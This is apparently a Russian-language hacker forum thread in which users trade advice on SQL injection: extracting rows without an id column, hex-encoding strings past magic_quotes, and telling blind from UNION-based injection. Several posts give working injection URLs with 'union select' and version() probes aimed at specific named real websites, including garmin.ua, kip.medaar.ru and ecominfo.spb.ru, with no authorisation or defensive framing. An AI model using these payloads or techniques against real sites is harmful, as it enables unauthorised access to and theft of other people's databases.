Посмотрел, но не совсем уловил принцип. А если id_user вообще нет? У меня вывод поля идет в заголовки, так что вывести всю таблицу скорее всего не удасться просто в принципе. Вот тут заминка: username>'последнего полученного_значения' Это ничего не дало - записи выводятся так же с первой и до 1024 символа. И то, что username - строковый параметр, не влияет на операцию сравнения?
Если у тя magic_quotes_gps on то надо привести к hex строку. можно посмотреть на поле id и использовать его(оно зачастую auto_increment)
Все, разобрался, просто опечатался в запросе, а в hex знаю, что переводить надо. Единственный вопрос, как быть с теми случаями, когда нет столбца с id?
Подскажите вот сайт: Я так понял, что это слепая инъекция. Т.е. количество полей возможно подобрать, так чтобы отобразилась страница 1163, но что делать дальше если нет принтабельных полей? Брутить? Если да то как это сделать? З.Ы. Слепые инъекции - это типа blind?
Code: http://www.garmin.ua/catalog/maps/?id=1163+and+substring(version(),1,1)=4 4-ая ветка, есть табла users
Почему же она слепая???? Code: http://www.garmin.ua/catalog/maps/?id=1163+and+1=2+union+select+null,version(),null,null,null,null,null,null,null+--+ Но версия всё равно 4ка
Я так подумал, потому что не было ошибок Хотел спросить что делает вот это: "+and+1=2" ? И почему вместо 1,2,3,... пишется нулл,нулл,... ?
1) это дело привычки 2) Code: http://kip.medaar.ru/prod.php?idsub=-1+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1 Code: http://kip.medaar.ru/prod.php?idsub=105+and+1=2+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1 (долго это искал чтоб показать)
Code: http://www.ecominfo.spb.ru/about/print.php?id=-1211+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+%20--+ а чо бы ей быть слепой?вывод есть!
Слепота в каком месте??? Code: http://www.ecominfo.spb.ru/about/print.php?id=1211+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26+--+
